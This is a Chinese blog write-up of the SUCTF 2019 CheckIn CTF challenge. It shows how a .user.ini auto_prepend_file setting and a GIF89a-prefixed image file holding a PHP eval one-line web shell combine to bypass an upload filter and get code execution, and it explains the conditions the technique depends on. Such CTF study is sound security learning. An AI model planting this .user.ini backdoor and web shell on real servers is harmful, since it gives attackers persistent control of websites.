美文网首页
[SUCTF 2019]CheckIn

[SUCTF 2019]CheckIn

作者: 佛系小沈 | 来源:发表于2019-12-09 12:47 被阅读0次

先讲操作

首先,构造一个.user.ini文件,内容如下:

GIF89a                  
auto_prepend_file=a.jpg 

然后构造一个a.jpg,内容如下:

GIF89a
<script language='php'> @eval($_POST['pass']);</script>

然后将两个文件分别上传到服务器上,拿到回显:


uploads/33c6f8457bd77fce0b109b4554e1a95c

在这里可以看到 uploads/33c6f8457bd77fce0b109b4554e1a95c对应的文件夹下面有两个文件,一个是.user.ini,还一个是a.jpg,当然,还有一个index.php。那就可以构造URL了并用蚁剑连接一下:
http://4f7ddb54-149b-4d8b-80be-af7658abcea1.node3.buuoj.cn/uploads/33c6f8457bd77fce0b109b4554e1a95c/index.php

图片.png
打开文件即可得到flag

flag{877b66a3-cd3b-4a5b-b3c4-14c8e84c50c9}

再讲解析

首先拿到这个题目我也不怎么会做,先百度到大佬的博客看了看后,才做出来的。这里涉及到两个知识点:

1.利用.user.ini上传\隐藏后门

参考链接:https://wooyun.js.org/drops/user.ini%E6%96%87%E4%BB%B6%E6%9E%84%E6%88%90%E7%9A%84PHP%E5%90%8E%E9%97%A8.html
使用条件:
(1)服务器脚本语言为PHP
(2)对应目录下面有可执行的php文件
(3)服务器使用CGI/FastCGI模式

.user.ini实际上就是一个可以由用户“自定义”的php.ini,我们可以自定义除了PHP_INI_SYSTEM以外的模式,在执行php代码之前,系统会对.user.ini先做一个执行,然后才执行其他的php文件。

我们这边利用.user,ini先执行auto_prepend_file函数,auto_prepend_file表示在php程序加载第一个php代码前加载的php文件,也就是先加载了a.jpg里面的文件,即一句话木马。

然后利用蚁剑连接即可。

2.绕过exif_imagetype()

这边利用GIF89a文件头绕过

相关文章

  • [SUCTF 2019]CheckIn

    先讲操作 首先,构造一个.user.ini文件,内容如下: 然后构造一个a.jpg,内容如下: 然后将两个文件分别...

  • [SUCTF 2019]CheckIn

    [SUCTF 2019]CheckIn 首页是个上传页面,尝试上传一个shell,发现回显非法后缀。删除后缀再上传...

  • BUUCTF-[SUCTF 2019]CheckIn 记录

    21.[SUCTF 2019]CheckIn 碰坑,链接菜刀等一直不行,后面发面路径是上传路径+index.php...

  • SUCTF 2019-WEB-CheckIn

    复现地址:https://buuoj.cn/challenges#[SUCTF%202019]CheckIn 考察...

  • SUCTF 2019 PWN

    0x01 sudrv qemu: 开启了kalsr和smep保护init: 内核会加载驱动sudrv.ko,且pr...

  • SUCTF 2019 WriteUp

    Web Misc 签到题 给了一串编码,制作: 打开网页就可以得到flag。 game 查看源代码得到: 在/js...

  • [SUCTF 2019] SignIn

    如果对本文存在有疑问或需要工具可以在下方给我留言!这题比较简单题目下载地址:https://www.lanzous...

  • SUCTF 2019 复现

    0x00 SUCTF 2019 复现 Check In 其实一开始拿到题有点蒙,以为是常规的文件上传题目,连图片都...

  • 2019 SUCTF Web writeup

    这次比赛滑水了,只有中午和晚上有时间看题,都是大佬们带着飞的,记录下部分Web的解题思路 0x01 CheckIn...

  • [SUCTF] SUCTF web题目 writeup

    SUCTF 这周末打了suctf,协会的大佬们都去参加tctf了,都没人打pwn了,不过最终成绩还可以不过恭喜协会...

网友评论

      本文标题:[SUCTF 2019]CheckIn

      本文链接:https://www.haomeiwen.com/subject/omcbgctx.html